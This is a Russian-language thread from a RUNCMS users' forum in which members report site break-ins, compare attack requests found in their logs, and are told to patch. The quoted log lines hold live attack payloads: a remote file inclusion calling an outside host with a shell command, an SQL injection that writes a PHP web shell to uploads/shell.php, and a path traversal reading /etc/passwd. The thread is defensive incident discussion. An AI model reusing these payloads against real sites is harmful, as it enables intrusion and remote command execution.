Сайт сообщества | Клуб пользователей | О проекте

Имя
Пароль
ПравилаРегистрацияСправка
Сообщения за деньПоиск

Вернуться   Клуб пользователей портальной системы RUNCMS > Портал > Безопасность

Закрытая тема
 
Опции темы Опции просмотра
LARK вне форума LARK
[исход]

Аватар для LARK

Старый #1 11-29-2005, 20:41

Поступили сообщения о взломах нескольких сайтов. Возможно, появилась новая уязвимость в RUNCMS последней версии. В связи с этим, просьба внимательно следить за вашими сайтами, и по возможности сообщать обо всех подозрительных моментах. Это поможет локализовать и закрыть дырку.

Так же советаю заглядывать в этот и этот топики на .орге, там сообщения о двух взломах, возможно появится какая-нибудь дополнительная информация.


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
Usama вне форума Usama
Старший участник

Аватар для Usama

Старый #2 11-30-2005, 05:35

похоже ребята не апдейтились вовсе.... особенно по второму посту это заметно!!!
Вот что увидел у себя в логах по SQL инъекциям
28-11-2005 18:59:21 [storyid=48"/modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.solarisnapegada.net/tool.gif?&cmd=id] from: 201.19.1.201; ServerName: achcity.com

чорошо что newbb_plus не юзаю

Последний раз редактировалось Usama, 11-30-2005 в 05:39


Творческая работа - это прекрасный, необычайно тяжелый и изумительно радостный труд.
Николай Островский
Посетить домашнюю страницу Usama
  Сообщения: 1,404 c 10.12.2003 | Репутация: 82
Zormax вне форума Zormax
Старожил

Аватар для Zormax

Старый #3 11-30-2005, 13:42

Цитата:
Сообщение от Usama
Вот что увидел у себя в логах по SQL инъекциям
28-11-2005 18:59:21 [storyid=48"/modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.solarisnapegada.net/tool.gif?&cmd=id] from: 201.19.1.201; ServerName: achcity.com
У меня каждый день такие запросы (ошибки)...

Совет, поставить модуль myerrors, он много ошибок невидимых отлавливает...


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
clog вне форума clog
Зам старшего участника

Аватар для clog

Старый #4 11-30-2005, 13:55

У меня у 5 человек теперь кол-во сообщений на форуме 65000.

Думаете свзязоно с этой уязвимостью?

  Сообщения: 470 c 01.10.2004 | Репутация: 3
supaflyster вне форума supaflyster
Нерешительный


Старый #5 11-30-2005, 15:48

У меня в логах следующее
GET /modules/wfdownloads/viewcat.php?list=-1%27or%27a%27%3D%27a%27+UNION+SELECT+0%2C0%2C0%2C% 27%3C%3F
php+error_reporting%280%29%3Bini_set%28%22max_exec ution_time%22%2C0%29%3Becho+%22Hi+
Master+%22%3Bsystem%28%24_GET%5Bcmd%5D%29%3B%3F%3E %27%2C0%2C0%2C0%2C0%2C0%2C0
%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2 C0%2C0%2C0%2C0%2C0%2C0%2
C0%2C0%2C0%2C0%2C0%2C0+INTOOUTFILE+%27..%2F..%2Fww w%2Fuploads%2Fshell.php%27+FROM+f
pg_wfdownloads_downloads%2F%2A HTTP/1.1" 500 14321

и еще
GET /class/xoopseditor/textarea/editor_registry.php?xoops_Config[language]=../../../../etc/passwd

Последний раз редактировалось supaflyster, 11-30-2005 в 15:58

Посетить домашнюю страницу supaflyster
  Сообщения: 4 c 11.05.2005 | Репутация: 1
Zormax вне форума Zormax
Старожил

Аватар для Zormax

Старый #6 11-30-2005, 16:18

У меня тоже прощупывали модули: wfdownloads и bamagalerie


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
Usama вне форума Usama
Старший участник

Аватар для Usama

Старый #7 11-30-2005, 17:45

советую прикрывать те ИП сразу ) Да в му ерорз у меня аж под 500 записей было, но большую часть боты поисковиков... со старыми ссылками.


Творческая работа - это прекрасный, необычайно тяжелый и изумительно радостный труд.
Николай Островский
Посетить домашнюю страницу Usama
  Сообщения: 1,404 c 10.12.2003 | Репутация: 82
LARK вне форума LARK
[исход]

Аватар для LARK

Старый #8 11-30-2005, 19:31

Цитата:
"/modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]
Это предыдущая дырка в форуме, о которой уже говорили и закрыли. Тут выход один ставить патчи - дырка была закрыта сразу же после взлома первого сайта.

Цитата:
Сообщение от supaflyster
wfdownloads
Цитата:
Сообщение от supaflyster
GET /class/xoopseditor/textarea/editor_registry.php?xoops_Config[language
Это дырки XOOPS и к RUNCMS они отношения не имеют.


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
Mimino вне форума Mimino
Участник

Аватар для Mimino

Старый #9 02-10-2006, 19:54

Залили сегодня на 1.2 эксплоит вида htdocs/UserFiles/suntzuXXXX.php3 (XXXX - цифры)

Вычистил вручную, но что дальше делать?

Сылка на текст эксплоита: http://www.milw0rm.com/id.php?id=1485

Поиск вредителей привел на 217.12.205.67, т.е. на http://www.itl.ua, где, видимо, они и находятся.

Последний раз редактировалось Mimino, 02-10-2006 в 19:57

  Сообщения: 288 c 14.01.2006 | Репутация: 5
LARK вне форума LARK
[исход]

Аватар для LARK

Старый #10 02-10-2006, 19:57

Цитата:
Сообщение от Mimino
Вычистил вручную, но что дальше делать?
Патчить

Тема
Новость
Файл


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
Закрытая тема


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Рейтинг@Mail.ru Хостинг провайдер Majordomo. Powered by: vBulletin Version 3.0
Copyright ©2000-2025, Jelsoft Enterprises Ltd.
Все разделы прочитаны - Руководство форума - Архив - Вверх
Rambler's Top100
Output: 88.30 Kb. compressed to 80.75 Kb. by saving 7.55 Kb. (8.55%)
Page generated in 0.09122 seconds with 12 queries